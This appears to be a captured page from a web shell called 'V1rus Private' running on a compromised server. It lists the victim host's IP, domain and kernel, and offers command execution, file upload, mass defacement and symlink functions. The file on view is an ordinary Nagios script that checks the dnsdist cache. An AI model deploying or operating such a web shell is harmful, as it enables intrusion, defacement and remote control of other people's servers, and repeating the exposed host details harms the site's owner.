V1rus Private
User / IP
:
216.73.217.108
Host / Server
:
190.92.174.125 / aerosofthealthcare.com
System
:
Linux s3739.bom1.stableserver.net 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
Cmd
|
Upload
|
Mass Deface
|
Create
|
Sym
:
/
lib64
/
nagios
/
plugins
/
Viewing: check_a2_dnsdist_cache.sh
#!/bin/bash CACHE=$(echo 'showPools()' | dnsdist -c | grep leastOutstanding | awk '{print $1}' | awk -F'/' '{print $1}') if [[ -z "$CACHE" ]]; then echo "dnsdist_cache - Unable to retrieve cache entries" exit 2 fi echo "dnsdist_cache entries=$CACHE; Number of cached entries: $CACHE" exit 0
Coded With 💗 by
HanzOFC